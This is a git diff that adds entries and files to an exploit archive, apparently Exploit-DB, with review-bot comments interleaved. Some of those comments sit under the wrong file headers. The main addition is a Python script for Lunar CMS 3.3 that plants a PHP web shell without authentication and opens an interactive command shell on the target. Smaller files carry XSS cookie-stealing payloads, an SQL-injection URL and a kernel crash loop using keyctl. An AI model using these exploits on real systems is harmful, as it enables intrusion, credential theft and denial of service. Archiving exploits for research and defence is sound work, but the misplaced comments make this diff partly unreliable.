diff --git a/files.csv b/files.csv
index f5dc3ef6c..a82288234 100755
--- a/files.csv
+++ b/files.csv
@@ -16525,7 +16525,7 @@ id,file,description,date,author,platform,type,port
 19168,platforms/unix/local/19168.sh,"SGI IRIX <= 6.5.4,Solaris <= 2.5.1 ps(1) Buffer Overflow Vulnerability",1997-04-28,"Joe Zbiciak",unix,local,0
 19172,platforms/unix/local/19172.c,"BSD/OS 2.1,DG/UX <= 7.0,Debian Linux <= 1.3,HP-UX <= 10.34,IBM AIX <= 4.2,SGI IRIX <= 6.4,Solaris <= 2.5.1 xlock Vulnerability (1)",1997-04-26,cesaro,unix,local,0
 19173,platforms/unix/local/19173.c,"BSD/OS 2.1,DG/UX <= 7.0,Debian Linux <= 1.3,HP-UX <= 10.34,IBM AIX <= 4.2,SGI IRIX <= 6.4,Solaris <= 2.5.1 xlock Vulnerability (2)",1997-04-26,BeastMaster,unix,local,0
-19174,platforms/php/webapps/19174.py,"Useresponse <= 1.0.2 Privilege Escalation & RCE Exploit",2012-06-15,mr_me,php,webapps,0
+19174,platforms/php/webapps/19174.py,"Useresponse <= 1.0.2 - Privilege Escalation & RCE Exploit",2012-06-15,mr_me,php,webapps,0
 19175,platforms/windows/local/19175.rb,"Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow",2012-06-17,metasploit,windows,local,0
 19176,platforms/windows/local/19176.rb,"TFM MMPlayer (m3u/ppl File) Buffer Overflow",2012-06-15,metasploit,windows,local,0
 19177,platforms/windows/remote/19177.rb,"ComSndFTP 1.3.7 Beta - USER Format String (Write4) Vulnerability",2012-06-15,metasploit,windows,remote,0
@@ -30504,6 +30504,7 @@ id,file,description,date,author,platform,type,port
 33863,platforms/hardware/remote/33863.rb,"D-Link hedwig.cgi Buffer Overflow in Cookie Header",2014-06-24,metasploit,hardware,remote,80
 33865,platforms/linux/remote/33865.rb,"AlienVault OSSIM av-centerd Command Injection",2014-06-24,metasploit,linux,remote,40007
 33866,platforms/hardware/webapps/33866.html,"Thomson TWG87OUIR - POST Password CSRF",2014-06-25,nopesled,hardware,webapps,0
+33867,platforms/php/webapps/33867.txt,"Lunar CMS 3.3 Unauthenticated Remote Command Execution Exploit",2014-06-25,LiquidWorm,php,webapps,0
 33868,platforms/multiple/remote/33868.txt,"Apache ActiveMQ 5.2/5.3 Source Code Information Disclosure Vulnerability",2010-04-22,"Veerendra G.G",multiple,remote,0
 33870,platforms/php/webapps/33870.txt,"FlashCard 2.6.5 'id' Parameter Cross Site Scripting Vulnerability",2010-04-22,Valentin,php,webapps,0
 33871,platforms/multiple/remote/33871.txt,"Tiny Java Web Server 1.71 Multiple Input Validation Vulnerabilities",2010-04-08,"cp77fk4r ",multiple,remote,0
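Review bot: The new 33867 row's description (`Lunar CMS 3.3 Unauthenticated Remote Command Execution Exploit`) runs product, version and title together, while the first hunk of this same commit normalises 19174 to the `Product Version - Title` form (`Useresponse <= 1.0.2 - Privilege Escalation & RCE Exploit`), so the index is made inconsistent by the very change that tidies it. The six rows added in the next hunk (33881 through 33886) have the same shape. If the dash-separated form is the intended convention, the new rows should follow it, e.g. `Lunar CMS 3.3 - Unauthenticated Remote Command Execution Exploit`; if it is not, the 19174 edit is the odd one out and should be said so in the commit message.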
@@ -30515,3 +30516,9 @@ id,file,description,date,author,platform,type,port
 33878,platforms/multiple/remote/33878.c,"NovaSTOR NovaNET <= 12.0 remote SYSTEM exploit",2007-09-25,mu-b,multiple,remote,0
 33879,platforms/multiple/dos/33879.c,"NovaSTOR NovaNET/NovaBACKUP <= 13.0 remote DoS",2007-10-02,mu-b,multiple,dos,0
 33880,platforms/windows/remote/33880.rb,"Cogent DataHub Command Injection",2014-06-25,metasploit,windows,remote,0
+33881,platforms/php/webapps/33881.txt,"PowerEasy 2006 'ComeUrl' Parameter Cross Site Scripting Vulnerability",2010-04-24,Liscker,php,webapps,0
+33882,platforms/php/webapps/33882.txt,"Cyber CMS 'faq.php' SQL Injection Vulnerability",2009-11-26,hc0de,php,webapps,0
+33883,platforms/php/webapps/33883.txt,"Kasseler CMS 2.0.5 'index.php' Cross Site Scripting Vulnerability",2010-04-26,indoushka,php,webapps,0
+33884,platforms/php/webapps/33884.txt,"Zikula Application Framework 1.2.2 ZLanguage.php lang Parameter XSS",2010-04-13,"High-Tech Bridge SA",php,webapps,0
+33885,platforms/php/webapps/33885.txt,"Zikula Application Framework 1.2.2 index.php func Parameter XSS",2010-04-13,"High-Tech Bridge SA",php,webapps,0
+33886,platforms/linux/dos/33886.txt,"Linux Kernel 'find_keyring_by_name()' Local Memory Corruption Vulnerability",2010-04-27,"Toshiyuki Okajima",linux,dos,0
diff --git a/platforms/linux/dos/33886.txt b/platforms/linux/dos/33886.txt
new file mode 100755
index 000000000..659131f34
--- /dev/null
+++ b/platforms/linux/dos/33886.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/39719/info
+
+The Linux kernel is prone to a local memory-corruption vulnerability.
+
+Attackers can exploit this issue to crash the affected computer, denying service to legitimate users. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
+
+kernel 2.6.34-rc5 is vulnerable.
+
+The following proof-of-concept is available:
+
+for ((i=0; i<100000; i++)); do keyctl session wibble /bin/true || break; done
\ No newline at end of file
diff --git a/platforms/php/webapps/33867.txt b/platforms/php/webapps/33867.txt
new file mode 100755
index 000000000..fcde3c0da
--- /dev/null
+++ b/platforms/php/webapps/33867.txt
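Review bot: The advisory states only that `kernel 2.6.34-rc5 is vulnerable` and gives neither an affected range nor a fixed version, so a reader of the archive cannot tell whether any released kernel is exposed or where the fix landed. One more line after the version statement, e.g. `Fixed in: <upstream fix reference>`, taken from the referenced BID rather than guessed, would make the entry usable for triage. The `dos` type chosen for the matching files.csv row is consistent with the advisory's confirmed impact, since the code-execution possibility is explicitly marked as unconfirmed.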
@@ -0,0 +1,119 @@
+?#!/usr/bin/env python
+#
+#
+# Lunar CMS 3.3 Unauthenticated Remote Command Execution Exploit
+#
+#
+# Vendor: Lunar CMS
+# Product web page: http://www.lunarcms.com
+# Affected version: 3.3
+#
+# Summary: Lunar CMS is a freely distributable open source content
+# management system written for use on servers running the ever so
+# popular PHP5 & MySQL.
+#
+# Desc: Lunar CMS suffers from an unauthenticated arbitrary command
+# execution vulnerability. The issue is caused due to the improper
+# verification of elfinder's upload/create/rename function in the file
+# manager. This can be exploited to execute arbitrary PHP code by creating
+# or uploading a malicious PHP script file that will be stored in '/files'
+# directory.
+#
+# Tested on: Apache/2.4.7 (Win32)
+# PHP/5.5.6
+# MySQL 5.6.14
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# @zeroscience
+#
+#
+# Advisory ID: ZSL-2014-5189
+# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5189.php
+#
+# Vendor fix: http://lunarcms.com/Get.html
+#
+#
+# 11.06.2014
+#
+
+
+import cookielib, urllib
+import urllib2, sys, os
+
+piton = os.path.basename(sys.argv[0])
+
+if len(sys.argv) < 4:
+ print '\n\x20\x20[*] Usage: '+piton+' \n'
+ print '\x20\x20[*] Example: '+piton+' zeroscience.mk lunarcms backdoor.php\n'
+ sys.exit()
+
+host = sys.argv[1]
+path = sys.argv[2]
+fname = sys.argv[3]
+
+cj = cookielib.CookieJar()
+opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
+
+create = opener.open('http://'+host+'/'+path+'/admin/includes/elfinder/php/connector.php?cmd=mkfile&name='+fname+'&target=l1_XA')
+#print create.read()
+
+payload = urllib.urlencode({
+ 'cmd' : 'put',
+ 'target' : 'l1_'+fname.encode('base64','strict'),
+ 'content' : ''
+ })
+
+write = opener.open('http://'+host+'/'+path+'/admin/includes/elfinder/php/connector.php', payload)
+#print write.read()
+print '\n'
+while True:
+ try:
+ cmd = raw_input('shell@'+host+':~# ')
+
+ execute = 
opener.open('http://'+host+'/'+path+'/files/'+fname+'?cmd='+urllib.quote(cmd))
+ reverse = execute.read()
+ print reverse;
+
+ if cmd.strip() == 'exit':
+ break
+
+ except Exception:
+ break
+
+sys.exit()
+
+
+#
+# Using the upload vector:
+#
+# POST /lc/admin/includes/elfinder/php/connector.php HTTP/1.1
+# Host: localhost
+# User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
+# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+# Accept-Language: en-US,en;q=0.5
+# Accept-Encoding: gzip, deflate
+# Referer: http://localhost/lc/admin/file_manager.php
+# Content-Length: 443
+# Content-Type: multipart/form-data; boundary=---------------------------156802976525302
+# Cookie: PHPSESSID=n37tnhsdfs1sgolum477jgqg33
+# Connection: keep-alive
+# Pragma: no-cache
+# Cache-Control: no-cache
+#
+# -----------------------------156802976525302
+# Content-Disposition: form-data; name="cmd"
+#
+# upload
+# -----------------------------156802976525302
+# Content-Disposition: form-data; name="target"
+#
+# l1_XA
+# -----------------------------156802976525302
+# Content-Disposition: form-data; name="upload[]"; filename="shell.php"
+# Content-Type: application/octet-stream
+#
+#
+# -----------------------------156802976525302--
+#
+#
diff --git a/platforms/php/webapps/33881.txt b/platforms/php/webapps/33881.txt
new file mode 100755
index 000000000..48d125b3d
--- /dev/null
+++ b/platforms/php/webapps/33881.txt
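Review bot: The archived copy begins with a stray `?` before the `#!/usr/bin/env python` shebang, which looks like a mis-decoded byte-order mark from the submitted file rather than part of the advisory, and the usage line `print '\n\x20\x20[*] Usage: '+piton+' \n'` has lost the argument placeholders that the example line on the next row implies (host, path, file name), presumably because they were angle-bracketed and stripped on import. Both mean the stored file no longer matches the published advisory; the stray byte should be dropped and the placeholders restored from the original source (ZSL-2014-5189, linked in the header) so the archive stays faithful to what was published.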
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/39696/info
+
+PowerEasy is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+PowerEasy 2006 is vulnerable; other versions may also be affected.
+
+http://www.example.com:80/user/User_ChkLogin.asp?ComeUrl=" style="XSS:expression(alert(/liscker/))"
\ No newline at end of file
diff --git a/platforms/php/webapps/33882.txt b/platforms/php/webapps/33882.txt
new file mode 100755
index 000000000..155dacdc2
--- /dev/null
+++ b/platforms/php/webapps/33882.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/39698/info
+
+Cyber CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/faq.php?id=SQL_CODE
\ No newline at end of file
diff --git a/platforms/php/webapps/33883.txt b/platforms/php/webapps/33883.txt
new file mode 100755
index 000000000..66997da7a
--- /dev/null
+++ b/platforms/php/webapps/33883.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/39703/info
+
+Kasseler CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+This issue affects Kasseler CMS 2.0.5; other versions may also be affected.
+
+http://www.example.com/index.php?online/<script>alert(213771818860)</script>
\ No newline at end of file
diff --git a/platforms/php/webapps/33884.txt b/platforms/php/webapps/33884.txt
new file mode 100755
index 000000000..d88ed29c8
--- /dev/null
+++ b/platforms/php/webapps/33884.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/39717/info
+
+Zikula Application Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Zikula Application Framework 1.2.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/?lang=en%27%22%3E%3Cimg%20src=0%20onerror=alert%28document.cookie%29%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/33885.txt b/platforms/php/webapps/33885.txt
new file mode 100755
index 000000000..b0fe0f965
--- /dev/null
+++ b/platforms/php/webapps/33885.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/39717/info
+
+Zikula Application Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Zikula Application Framework 1.2.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.php?module=adminpanel&type=admin&func=adminpanel&lang=en%27%22%3E%3Cimg%20src=0%20onerror=alert%28document.cookie%29%3E
\ No newline at end of file